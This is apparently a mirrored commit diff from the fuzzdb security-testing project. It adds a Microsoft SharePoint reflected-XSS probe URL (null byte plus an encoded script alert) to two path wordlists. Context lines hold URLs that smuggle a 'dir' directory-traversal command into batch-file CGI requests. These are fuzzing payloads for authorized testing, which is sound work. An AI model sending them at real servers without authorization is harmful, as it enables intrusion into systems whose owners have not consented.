mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 13:34:12 +00:00
added microsoft sharepoint xss
This commit is contained in:
parent
8af5d82ad9
commit
aa9b6d8310
3 changed files with 3 additions and 1 deletions
|
@ -1,4 +1,4 @@
|
|||
# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything.
|
||||
# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot.
|
||||
/cart32.exe
|
||||
/get32.exe
|
||||
/visadmin.exe
|
||||
|
@ -76,3 +76,4 @@
|
|||
/test-cgi.bat
|
||||
/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
|
||||
/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
|
||||
|
|
|
@ -632,6 +632,7 @@ _layouts/getsspscopes.aspx
|
|||
_layouts/getsspstatus.aspx
|
||||
_layouts/groups.aspx
|
||||
_layouts/help.aspx
|
||||
_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
|
||||
_layouts/helpcontent.aspx
|
||||
_layouts/helpsearch.aspx
|
||||
_layouts/hold.aspx
|
||||
|
|
BIN
docs/misc/Wireshark_Display_Filters.pdf
Normal file
BIN
docs/misc/Wireshark_Display_Filters.pdf
Normal file
Binary file not shown.
Loading…
Reference in a new issue